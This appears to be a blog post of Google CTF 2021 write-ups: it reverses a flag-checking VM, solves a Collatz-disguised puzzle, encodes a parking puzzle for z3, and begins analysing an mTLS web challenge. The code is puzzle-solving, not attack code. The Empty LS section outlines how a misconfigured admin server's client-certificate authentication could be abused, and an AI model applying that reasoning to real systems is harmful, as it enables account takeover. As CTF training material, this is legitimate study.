    <span class="s">"INVALID FLAG"</span>      <span class="c1">// 57</span>
<span class="p">}</span>

<span class="n">EXIT</span>                    <span class="c1">// 58</span>
</code></pre></div></div>

<p>With some tidy up, and write it in Go, we get</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">var</span> <span class="n">M</span> <span class="kt">uint8</span> <span class="o">=</span> <span class="m">0</span>
<span class="k">var</span> <span class="n">N</span> <span class="kt">uint8</span> <span class="o">=</span> <span class="m">1</span>
<span class="k">var</span> <span class="n">P</span> <span class="kt">uint8</span> <span class="o">=</span> <span class="m">0</span>
<span class="k">var</span> <span class="n">Q</span> <span class="kt">uint8</span> <span class="o">=</span> <span class="m">0</span>

<span class="k">for</span> <span class="n">I</span> <span class="o">:=</span> <span class="kt">uint8</span><span class="p">(</span><span class="m">0</span><span class="p">);</span> <span class="n">I</span> <span class="o">&lt;</span> <span class="m">27</span><span class="p">;</span> <span class="n">I</span><span class="o">++</span> <span class="p">{</span>
    <span class="n">A</span> <span class="o">:=</span> <span class="n">MEMORY</span><span class="p">(</span><span class="m">0x80</span> <span class="o">+</span> <span class="n">I</span><span class="p">)</span>
    <span class="n">B</span> <span class="o">:=</span> <span class="n">MEMORY</span><span class="p">(</span><span class="n">I</span><span class="p">)</span>

    <span class="k">var</span> <span class="n">X</span> <span class="kt">uint8</span> <span class="o">=</span> <span class="m">1</span>
    <span class="k">var</span> <span class="n">Y</span> <span class="kt">uint8</span> <span class="o">=</span> <span class="m">0</span>
    <span class="k">for</span> <span class="n">X</span> <span class="o">!=</span> <span class="m">0</span> <span class="p">{</span>
        <span class="k">if</span> <span class="n">X</span><span class="o">&amp;</span><span class="n">B</span> <span class="o">!=</span> <span class="m">0</span> <span class="p">{</span>
            <span class="n">Y</span> <span class="o">+=</span> <span class="n">A</span>
        <span class="p">}</span>
        <span class="n">X</span> <span class="o">+=</span> <span class="n">X</span>
        <span class="n">A</span> <span class="o">+=</span> <span class="n">A</span>
    <span class="p">}</span>
    <span class="n">A</span> <span class="o">=</span> <span class="n">Y</span>

    <span class="n">O</span> <span class="o">:=</span> <span class="n">M</span> <span class="o">+</span> <span class="n">N</span>
    <span class="n">M</span> <span class="o">=</span> <span class="n">N</span>
    <span class="n">N</span> <span class="o">=</span> <span class="n">O</span>

    <span class="n">A</span> <span class="o">+=</span> <span class="n">M</span>
    <span class="n">A</span> <span class="o">^=</span> <span class="n">MEMORY</span><span class="p">(</span><span class="m">0x20</span> <span class="o">+</span> <span class="n">I</span><span class="p">)</span>
    <span class="n">P</span> <span class="o">+=</span> <span class="n">A</span>

    <span class="n">Q</span> <span class="o">|=</span> <span class="n">MEMORY</span><span class="p">(</span><span class="m">0x40</span><span class="o">+</span><span class="n">I</span><span class="p">)</span> <span class="o">^</span> <span class="n">P</span>
<span class="p">}</span>

<span class="k">if</span> <span class="n">Q</span> <span class="o">!=</span> <span class="m">0</span> <span class="p">{</span>
    <span class="n">fmt</span><span class="o">.</span><span class="n">Println</span><span class="p">(</span><span class="s">"invalid flag"</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Notice that <code class="language-plaintext highlighter-rouge">R</code> is gone. Since <code class="language-plaintext highlighter-rouge">~1 + 2 == 0</code> is for sure, we can optimize it out. Some of the intermediate variables are also optimized out.</p>

<h2 id="get-the-flag">Get the Flag</h2>

<p>It is possible to figure out the logic behind the memory operations and try to extract the flag by reversing the process. However, with some observation, we see that the flag is identified as invalid when <code class="language-plaintext highlighter-rouge">Q != 0</code> when the program ends. Looking at the entire program, <code class="language-plaintext highlighter-rouge">Q</code> is only calculated once here <code class="language-plaintext highlighter-rouge">Q |= [some value]</code>. By the property of the bitwise-or, any set bit will remain to be set. Therefore, in order for <code class="language-plaintext highlighter-rouge">Q == 0</code> at the end, it must be that for each iteration of the loop, <code class="language-plaintext highlighter-rouge">Q</code> is kept at zero.</p>

<p>Also, the program processes flag string one byte by one byte, which means that, if at any iteration of the loop, <code class="language-plaintext highlighter-rouge">Q</code> is some value not <code class="language-plaintext highlighter-rouge">0</code>, then that byte must be a faulty byte.</p>

<p>Using this knowledge, we are able to reduce the search space from \(65^{27}\) to \(65 \times 27\). The exploit then is to test out the string character one-by-one, and continue if <code class="language-plaintext highlighter-rouge">Q</code> is kept 0 during the loop.</p>

<p><img src="/assets/images/google-ctf-2021/cpp2.png" alt="cpp.go" /></p>

<p>The exploit can be found here: <a href="https://gist.github.com/superfashi/f264b9c9f19b8b25065afd9f66bf7ffd" target="_blank">CPP, Google CTF 2021</a>.</p>

<hr />

<h1 id="icantbelieveitsnotcrypto">ICAN’TBELIEVEIT’SNOTCRYPTO</h1>

<p>This is a pretty simple challenge, once you know what is going on.</p>

<p>So the question asks to give two lists <code class="language-plaintext highlighter-rouge">l1</code> and <code class="language-plaintext highlighter-rouge">l2</code>, where <code class="language-plaintext highlighter-rouge">l1</code> contains only 0 and 1, and <code class="language-plaintext highlighter-rouge">l2</code> only contains 0, 1, and 2. The lists go through the function <code class="language-plaintext highlighter-rouge">step()</code> each time, and <code class="language-plaintext highlighter-rouge">count()</code> counts how many steps it will take for <code class="language-plaintext highlighter-rouge">l1</code> and <code class="language-plaintext highlighter-rouge">l2</code> to reach the state where <code class="language-plaintext highlighter-rouge">l1 = [1]</code> and <code class="language-plaintext highlighter-rouge">l2 = [0]</code>. The flag will be printed if it needs more than 2000 steps.</p>

<p>There are two constraints, namely that <code class="language-plaintext highlighter-rouge">len(l1) == len(l2)</code> and <code class="language-plaintext highlighter-rouge">len(l1) &lt; 24</code>. So you can’t give a sufficiently large array to pass the test.</p>

<p>I spend a <em>LOT</em> of time on this and didn’t found the solution, only to found that this is a well-known and studied problem in disguise. It is actually the process described in <a href="https://en.wikipedia.org/wiki/Collatz_conjecture">Collatz conjecture</a>. And <code class="language-plaintext highlighter-rouge">l1</code> and <code class="language-plaintext highlighter-rouge">l2</code> is just a simple conversion from a number to its base-6 form, and for each digit split across two lists. A simple conversion script looks like this:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">to_lists</span><span class="p">(</span><span class="n">num</span><span class="p">):</span>
    <span class="n">l1</span> <span class="o">=</span> <span class="p">[]</span>
    <span class="n">l2</span> <span class="o">=</span> <span class="p">[]</span>
    <span class="k">while</span> <span class="n">num</span><span class="p">:</span>
        <span class="n">digit</span> <span class="o">=</span> <span class="n">num</span> <span class="o">%</span> <span class="mi">6</span>
        <span class="n">l1</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">digit</span> <span class="o">&amp;</span> <span class="mi">1</span><span class="p">)</span>
        <span class="n">l2</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">digit</span> <span class="o">&gt;&gt;</span> <span class="mi">1</span><span class="p">)</span>
        <span class="n">num</span> <span class="o">//=</span> <span class="mi">6</span>
    <span class="k">return</span> <span class="n">l1</span><span class="p">,</span> <span class="n">l2</span>

<span class="k">def</span> <span class="nf">from_lists</span><span class="p">(</span><span class="n">l1</span><span class="p">,</span> <span class="n">l2</span><span class="p">):</span>
    <span class="n">num</span><span class="p">,</span> <span class="n">mul</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="nf">len</span><span class="p">(</span><span class="n">l1</span><span class="p">)):</span>
        <span class="n">digit</span> <span class="o">=</span> <span class="n">l1</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">|</span> <span class="p">(</span><span class="n">l2</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&lt;&lt;</span> <span class="mi">1</span><span class="p">)</span>
        <span class="n">num</span> <span class="o">+=</span> <span class="n">digit</span> <span class="o">*</span> <span class="n">mul</span>
        <span class="n">mul</span> <span class="o">*=</span> <span class="mi">6</span>
    <span class="k">return</span> <span class="n">num</span>
</code></pre></div></div>

<p>The starting value that has the largest total stopping time within the range of \(6^{24} \approx 10^{18}\) is written on the Wikipedia page:</p>

<blockquote>
  <p>less than 10<sup>17</sup> is <span class="nowrap">93<span style="margin-left:.25em;">571</span><span style="margin-left:.25em;">393</span><span style="margin-left:.25em;">692</span><span style="margin-left:.25em;">802</span><span style="margin-left:.25em;">302</span></span>, which has 2091 steps […]</p>
</blockquote>

<p>which is enough for the required 2000 steps. Therefore the exploit is simply something like this:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">char</span> <span class="o">=</span> <span class="nf">ord</span><span class="p">(</span><span class="sh">'</span><span class="s">f</span><span class="sh">'</span><span class="p">)</span>
<span class="nf">assert</span><span class="p">(</span><span class="n">char</span> <span class="o">%</span> <span class="mi">6</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">l1</span><span class="p">,</span> <span class="n">l2</span> <span class="o">=</span> <span class="nf">to_lists</span><span class="p">(</span><span class="mi">93571393692802302</span><span class="p">)</span>
<span class="n">str1</span><span class="p">,</span> <span class="n">str2</span> <span class="o">=</span> <span class="sh">""</span><span class="p">,</span> <span class="sh">""</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">l1</span><span class="p">:</span>
    <span class="n">str1</span> <span class="o">+=</span> <span class="nf">chr</span><span class="p">(</span><span class="n">char</span> <span class="o">+</span> <span class="n">i</span><span class="p">)</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">l2</span><span class="p">:</span>
    <span class="n">str2</span> <span class="o">+=</span> <span class="nf">chr</span><span class="p">(</span><span class="n">char</span> <span class="o">+</span> <span class="n">i</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="n">str1</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="n">str2</span><span class="p">)</span>
</code></pre></div></div>

<p>Which gives us output string <code class="language-plaintext highlighter-rouge">fggffgfgfggffffgffgggf</code> and <code class="language-plaintext highlighter-rouge">fgghfgghhhhhhghffgggfh</code>. Input it and we get the flag.</p>

<hr />

<p>It is very lucky that my teammates figured this out at then end, but not me. I was on a path of no-return: I tried to search the answer out.</p>

<p>The following is a record of what I did during the CTF, you will see that I was extremely close to the answer, both in my answer and method.</p>

<h2 id="reversible-function">Reversible Function</h2>

<p>So the <code class="language-plaintext highlighter-rouge">step()</code> function may not have a one-to-one relationship, but it’s definitely reversible.</p>

<p>First, we can determine that both lists will have the same length, and there are no <code class="language-plaintext highlighter-rouge">0</code>s at the end of both lists, because they are stripped away. The problem is, how many <code class="language-plaintext highlighter-rouge">0</code> should we append, because there could be infinitely many such <code class="language-plaintext highlighter-rouge">0</code>s that were stripped away. Don’t worry so fast, let’s ignore that for now and continue the analysis.</p>

<p>The <code class="language-plaintext highlighter-rouge">SBOX</code> is easily reversible because it obviously has an one-to-one relationship, so we could build a reverse mapping to convert the list back.</p>

<p>Notice this line <code class="language-plaintext highlighter-rouge">l1.append(0)</code>, meaning <code class="language-plaintext highlighter-rouge">l1</code> should have a <code class="language-plaintext highlighter-rouge">0</code> at the end. However, if we don’t have a <code class="language-plaintext highlighter-rouge">0</code> at the end of <code class="language-plaintext highlighter-rouge">l1</code>, then it must be that there are another <code class="language-plaintext highlighter-rouge">0</code> that was at the end of <code class="language-plaintext highlighter-rouge">l2</code>. So, we have something like this</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="n">l1</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">:</span>
    <span class="n">l1</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
    <span class="n">l2</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="n">l1</span><span class="p">.</span><span class="nf">pop</span><span class="p">()</span> <span class="c1"># correspond to l1.append(0)
</span></code></pre></div></div>

<p>Here we only append one <code class="language-plaintext highlighter-rouge">0</code> to each end of the list, why only one? Notice that if we append more than 1 zeros, then this list is impossible to be the result of a single <code class="language-plaintext highlighter-rouge">step()</code>, as the tailing <code class="language-plaintext highlighter-rouge">0</code>s are trimmed at the end of each <code class="language-plaintext highlighter-rouge">step()</code>.</p>

<p>The for the final casing, we see that we could have two cases, one is that the original <code class="language-plaintext highlighter-rouge">l1</code> begins with a <code class="language-plaintext highlighter-rouge">0</code>, another is that <code class="language-plaintext highlighter-rouge">l1</code> begins with an <code class="language-plaintext highlighter-rouge">1</code>, and the resulting <code class="language-plaintext highlighter-rouge">l2</code> begins with an <code class="language-plaintext highlighter-rouge">1</code>. So we have</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># possibility 1
</span><span class="n">ori_l1</span><span class="p">,</span> <span class="n">ori_l2</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="n">l1</span><span class="p">,</span> <span class="n">l2</span>     <span class="c1"># correspond to l1.pop(0)
</span>
<span class="c1"># possibility 2
</span><span class="k">if</span> <span class="n">l2</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mi">1</span> <span class="ow">and</span> <span class="n">l1</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
    <span class="n">ori_l1</span><span class="p">,</span> <span class="n">ori_l2</span> <span class="o">=</span> <span class="mi">1</span><span class="p">,</span> <span class="n">l2</span><span class="p">[</span><span class="mi">1</span><span class="p">:]</span>    <span class="c1"># correspond to l2.insert(0, 1)
</span></code></pre></div></div>

<p>Taken together, we have the reverse function as:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">reverse_step</span><span class="p">(</span><span class="n">l1</span><span class="p">,</span> <span class="n">l2</span><span class="p">):</span>
    <span class="k">if</span> <span class="ow">not</span> <span class="n">l1</span> <span class="ow">or</span> <span class="ow">not</span> <span class="n">l2</span> <span class="ow">or</span> <span class="n">l1</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="n">l2</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
        <span class="k">return</span>
    
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="nf">len</span><span class="p">(</span><span class="n">l1</span><span class="p">)):</span>
        <span class="n">l1</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">l2</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">RBOX</span><span class="p">[(</span><span class="n">l1</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">l2</span><span class="p">[</span><span class="n">i</span><span class="p">])]</span>
    
    <span class="k">if</span> <span class="n">l1</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
        <span class="n">l1</span><span class="p">.</span><span class="nf">pop</span><span class="p">()</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">l2</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
    
   	<span class="n">ret</span> <span class="o">=</span> <span class="p">[[</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="n">l1</span><span class="p">,</span> <span class="n">l2</span><span class="p">]</span>
    <span class="k">if</span> <span class="n">l2</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mi">1</span> <span class="ow">and</span> <span class="n">l1</span> <span class="ow">and</span> <span class="n">l1</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
        <span class="n">ret</span><span class="p">.</span><span class="nf">append</span><span class="p">([</span><span class="n">l1</span><span class="p">,</span> <span class="n">l2</span><span class="p">[</span><span class="mi">1</span><span class="p">:]])</span>
    <span class="k">return</span> <span class="n">ret</span>
</code></pre></div></div>

<p>Where <code class="language-plaintext highlighter-rouge">RBOX</code> is the reverse of <code class="language-plaintext highlighter-rouge">SBOX</code>.</p>

<h2 id="search">Search.</h2>

<p>So our search space is an incomplete binary tree (later to be found out called <em>Collatz Graph</em>). However, for a search depth more than 2000, there could be as many as $2^{2000}$ states, and even if we consider most of the branches are single links most of the time, the search space is still enormously huge for simple algorithms like breadth-first search, so it’s a no-go.</p>

<p>Depth-first search seems like a good idea. However, the list length is limited to 23, meaning that our DFS really is an IDDFS, and that it performs no better than BFS in this case. So we have to turn to something else. By the way, the longest path problem is a known NP-hard problem, although I’m not quite sure if this really is a longest path problem.</p>

<p>Trying a lot of things, finally settled on a heuristic priority-based parallelized searching algorithm with exploration. I know that sounds like a lot, but let me explain.</p>

<h3 id="heuristic">Heuristic</h3>

<p>The easiest one to consider, which I tried first, is to simply rely on the <code class="language-plaintext highlighter-rouge">count</code> (stopping time): whichever node has the largest <code class="language-plaintext highlighter-rouge">count</code> will get searched first. That easily turned out to be really bad, because the search would stuck on some leaves of a branch in the tree that has no chance to grow bigger because of the length limitation.</p>

<p>Then I tried a lot of different functions based on <code class="language-plaintext highlighter-rouge">count</code> and another parameter, the <code class="language-plaintext highlighter-rouge">length</code> of the list (upper bound of the number). I intuitively thought that it must be better if we can get a sufficiently large <code class="language-plaintext highlighter-rouge">count</code> with small <code class="language-plaintext highlighter-rouge">length</code>, meaning it has much more potential to spread out without reaching the length limit.</p>

<p>Few things I tried:</p>

<ul>
  <li>
\[\frac{\text{count}^{k_1}}{\text{length}^{k_2}}\]
  </li>
  <li>
\[\max\left(k_1 \frac{\text{count}}{2000}, k_2 \frac{\text{length}}{23}\right)\]
  </li>
  <li>
\[\log\text{count} \cdot \left(1-\frac{\text{length}}{23}\right)\]
  </li>
  <li>
\[k_1 \frac{\text{count}}{2000} - k_2 \frac{\text{length}}{23}\]
  </li>
</ul>

<p>where $k_1$ and $k_2$ are some weights that I tweak by hand. All of them worked pretty well with manual tweaking, however, they all stopped around ~1300, which is still far from what we need.</p>

<h3 id="exploration">Exploration</h3>

<p>Thinking that the heuristic is not good enough, I also added an exploration factor \(1 &gt; p \gg 0\) into the game. Every time a new node is selected, the program will have a probability of \(p\) to choose the top of the priority queue (i.e. with the largest heuristic), and a slight $1-p$ chance to choose something in the middle of the queue.</p>

<p>This exploration part is here for the hope that by some chance, the program will bump into the <em>correct</em> node which would lead us to victory. This “optimization” supposedly shouldn’t have a big impact to the overall dynamics of the search, but it is a way to improve the search anyhow.</p>

<h3 id="parallelization">Parallelization</h3>

<p>Now time for multithreaded computing. This is actually pretty easy to code with Go’s built-in goroutine and <code class="language-plaintext highlighter-rouge">sync.Cond</code>. All I need is to boot up some worker goroutine, and use <code class="language-plaintext highlighter-rouge">sync.Cond</code> to notify the workers each time a new node is found. I left it running for  some time, and restart it once its stuck for more than 5 minutes, hoping the above exploration mechanism would work. It did do some magic, though, as I was able to get lists with a large <code class="language-plaintext highlighter-rouge">count</code>.</p>

<hr />

<p>It eventually stopped increasing more than 1636, and this is what I get at the end:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">l1</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">]</span>
<span class="n">l2</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">2</span><span class="p">]</span>
</code></pre></div></div>

<p>During the search process, in order to record the states, <strong>I turned the states into base-6 numbers</strong> already, but I just didn’t print them out to figure out what’s going on, what a sad story.</p>

<p>The codes I wrote is over here, very messy: <a href="https://gist.github.com/superfashi/aa090637fb2ba1ade48c58a9f816455b">number (gist)</a>.</p>

<h1 id="parking">PARKING</h1>

<p>I didn’t actually solve this challenge during the match—my teammate did—but I did look into the question and found it pretty interesting. After the competition I tried to solve it myself. I think I found a “partially non-intended” way of solving this problem.</p>

<p>So this is a challenge that is marked as <code class="language-plaintext highlighter-rouge">hardware</code>, because the map <code class="language-plaintext highlighter-rouge">level2</code> actually works like a circuit, where you can clearly identify the normal <code class="language-plaintext highlighter-rouge">AND</code>, <code class="language-plaintext highlighter-rouge">OR</code> and <code class="language-plaintext highlighter-rouge">NOT</code> gate. The intended way, which my teammate did at the end, is to extract the circuit out and solve it using a Boolean satisfiability problem solver like the famous Z3. A <a href="https://ctftime.org/writeup/29351">write-up that tells you how to do it was nicely written by User1@osogi from team s3qu3nc3</a>, take a look!</p>

<p>However, with a closer inspection of the game level, I realized that even if we ignore the space taken away by other blocks, there is only a small number of moves each block can do. For example:</p>

<p><img src="/assets/images/google-ctf-2021/parking-1.png" alt="parking-1" /></p>

<p>This is a region that contains a lot of blocks, but let’s only focus on one block and take away all other blocks. Now you can slide that block freely up and down (or left and right if the block lies horizontally). But no matter which block you choose, because of the rugged path, there is not many places you can go. Using this observation, we can set up the variables in a way, such that the z3 solver can do all the job for us.</p>

<p>For the following, \((x, y, w, h)\) is a non-wall block that has it upper-left corner at \((x,y)\) position with dimensions \((w, h)\), with a implicit requirement that \(w = 1 \lor h=1\).</p>

<h2 id="variables">Variables</h2>

<p>First thing to do is to turn the wall blocks into a boolean matrix \(M\) of dimension \((\text{width}, \text{height})\), where \(M_{x, y}\) is <code class="language-plaintext highlighter-rouge">true</code> if the position \((x,y)\) is covered by a wall block, and <code class="language-plaintext highlighter-rouge">false</code> otherwise.</p>

<p>Currently if you were to check if a block \((x, y, w, h)\) intersects with a wall or not, you’d have to spend \(O(n)\) time every time, where \(n\) is the number of wall blocks given. However, using \(M\), it only takes \(O(w\cdot h)\) time to do the check, which is much more efficient.</p>

<p>To further compress the space usage, we can use an 1-D bit-vector $S$ of size \(\text{width}\cdot \text{height}\) for this, where $S_{x\cdot \text{height}+y} = M_{x, y}$.</p>

<p>With the help of this, we can quickly calculate all possible moves for each block, by sliding it up and down or left and right step-by-step until it hits the wall. We represent each move as an integer \(i\), where a positive one meaning the block can move to its down or right by \(i\) steps, a negative one meaning the block can move to its up or left by \(-i\) steps, and zero means that the block can stay where it was at the beginning. Notice that all the blocks have zeros in their move set \(D(b)\) (action domain), except for the red block, because the red block has to be moved at least by one step.</p>

<p>For example,</p>

<p><img src="/assets/images/google-ctf-2021/parking-2.png" alt="parking-2" /></p>

\[D(\text{red}) = \{-1, 0, 1, 2\}\\
D(\text{blue}) = \{-3, -2, -1, 0\}\\
D(\text{green}) = \{-1, 0\}\]

<p>There are 320,768 non-wall blocks in total, and 1,002,421 possible movements for all blocks (<strong>stay at the original location also counts as one move</strong>), meaning that on average a block has 3.12 possible moves.</p>

<p>Notice that with each move, we “generated” a new block that could potentially exist on the final state of the board. If we have a block $b_i = (x, y, w, 1)$ and \(D(b_i)=\{-1, 0\}\), on the final state of the board, there is a possibility that either $b_{i,0} = (x, y, w, 1)$ exists on the board, or $b_{i, -1} = (x-1, y, w, 1)$ exists on the board. Then, we can turn each of these indicators into boolean values, where $b_{i,0}$ is <code class="language-plaintext highlighter-rouge">true</code> represents that $b_{i,0}$ exists on the final state of the board, and <code class="language-plaintext highlighter-rouge">false</code> otherwise, so on and so forth.</p>

<blockquote>
  <p>I’ll abuse the notation a bit, so that a block symbol is a four-tuple and a bool value at the same time.</p>
</blockquote>

<p>The given code encodes the final state $s_i$ of the green block $i$ as a single bit into the flag string, where the bit is a 0 if the block is not moved, and 1 if it is moved, which means it nicely converts to our representation, where $s_i = \neg b_{i, 0}$.</p>

<h2 id="constraints">Constraints</h2>

<p>First obvious constraint we need to set up is that</p>

\[\forall b_i,\bigvee_{j\in D(b_i)} b_{i,j}\]

<p>Using English, this means for all non-wall blocks on the board, one of their available “moved” version must exists on the board, because a block cannot be taken away from the board.</p>

<p>Then, we have the constraint that for each space \((i, j)\) on the board, it can only be occupied by at most one block. Therefore, if we have two blocks, $a$ and $b$, that intersect with each other, then it must be that $a \implies \neg b$ (abusing of notation again). Notice that this automatically implies \(b \implies \neg a\), which means that we need only add one of them into the constraints.</p>

<p>To build these constraints, we need to find all kinds of intersections, and finding them in a normal \(O(n^2)\) way will not do, because \(n \approx 10^6\) which is too large for this. Notice that the actual number of the intersections exists \(\ll 10^6\) because a block will only potentially intersects with a nearby block. Hence, the optimization we can do is to pre-calculate the spaces each block occupies, and then for each space, add constraint that only one block can occupy that space. A pseudo-code looks like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>S := Map[(x, y) -&gt; Set[Block]]

FOR b IN blocks
  FOR (i, j) that b covers
    add b to set S[i, j]
  END
END

FOR (i, j) in S
  FOR b_1 in S[i, j]
    FOR b_2 in S[i, j] \ {b_1}
      add constraint (b_1 =&gt; !b_2)
    END
  END
END
</code></pre></div></div>

<p>That’s it. Notice that we didn’t add the constraint that limits only one of the same block’s moved version exists on the board, that means it’s totally valid to assume there are two disjoint version of the same block is set to <code class="language-plaintext highlighter-rouge">true</code> by the solver at the end (something like both \(b_{i, -2}\) and \(b_{i, 2}\) are <code class="language-plaintext highlighter-rouge">true</code>). However, that won’t affect our final answer, as a block taking two places is very unlikely to happen because how tight the spaces are.</p>

<p>Finally we have in total 3,288,449 constraints and 1,002,421 variables, and it took z3 about 3 minutes to solve on my computer. The exploit can be found over here: <a href="https://gist.github.com/superfashi/9de9c0828dd7229ddf3940e57b6220c9">Parking, Google CTF 2021</a>.</p>

<hr />

<h1 id="empty-ls">EMPTY LS</h1>

<p>Although I’m one of the web gangs, because there are too many interesting tasks this time, I didn’t even look at any of the web challenges. Empty LS is an exception because I heard the solution while my teammates talked about it. I think it’s a pretty creative challenge, so I want to write the solution here as well.</p>

<p>The challenge revolves around two domains, one is <code class="language-plaintext highlighter-rouge">https://www.zone443.dev</code>, a website to register accounts and custom sub-domains, and <code class="language-plaintext highlighter-rouge">https://admin.zone443.dev</code>, an “admin portal” and supposedly where we should get the flag.</p>

<p>The credential authentication for this website is unusual because it did not use the traditional username/password or cookies, but instead a process called <em>mTLS</em>, which stands for Mutual TLS. Basically what that means is when connecting to a server, the client also present a certificate that can achieve two things:</p>

<ol>
  <li>Validate the identity of the client, and</li>
  <li>Use the certificate to encrypt the communication.</li>
</ol>

<p>Unlike cookies or password, it is quite hard to steal the identity of the client using mTLS, because the private key is kept safe and the only way to get it is to somehow take control over the client’s machine. However, the client’s using the latest headless Chrome, so no more Chrome 0-days for us. Also there might be some vulnerabilities in the mTLS implementation, but since this is a <code class="language-plaintext highlighter-rouge">web</code> challenge not a <code class="language-plaintext highlighter-rouge">crypto</code> one, that possibility is also highly unlikely.</p>

<h2 id="observations">Observations</h2>

<p>A few important observations are made:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">https://admin.zone443.dev</code> is behind a server that doesn’t validate Server Name Indication in TLS Client Hello and <code class="language-plaintext highlighter-rouge">Host</code> field in HTTP request, it only uses the client certificate for application-level credential purpose;</li>
  <li><code class="language-plaintext highlighter-rouge">https://admin.zone443.dev</code> is using a wildcard certificate with Subject Alternative Name including host <code class="language-plaintext highlighter-rouge">*.zone443.dev</code>;</li>
  <li>We have total control over the sub-domain we applied for, including applying for a valid TLS certificate; and</li>
  <li>By filling out sub-domain address into the feedback form, a headless Chrome will request our sub-domain with the admin’s certificate.</li>
</ul>

<p>Combining 1 and 2, we realized that <strong>any</strong> TLS requests will be accepted by the server. And using 3 and 4, it is possible to obtain a copy of admin’s TLS handshake and the following communication.</p>

<p>There are some other hints that the challenge gives, which is when you try to access <code class="language-plaintext highlighter-rouge">admin.zone443.dev</code> with your own client certificate that you applied for, a message will tell you that you are not authorized. Therefore, it must be that only when we access the website with the admin’s client cert, we shall get the flag.</p>

